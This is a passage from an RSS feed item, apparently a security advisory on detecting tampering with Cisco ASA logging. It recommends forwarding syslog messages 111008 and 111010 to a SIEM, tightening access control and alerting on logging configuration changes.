<li>Enable and forward Cisco ASA syslog data with message IDs 111008 and 111010 to your SIEM as described in the references and the <code>how_to_implement</code> section.</li>
<li>Review and enforce strict access control policies for Cisco ASA devices to minimize the risk of unauthorized access.</li>
<li>Monitor and alert on changes to logging configurations on Cisco ASA devices to identify suspicious activity.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cisco_asa</category><category>logging</category><category>defense_evasion</category><category>network</category></item></channel></rss>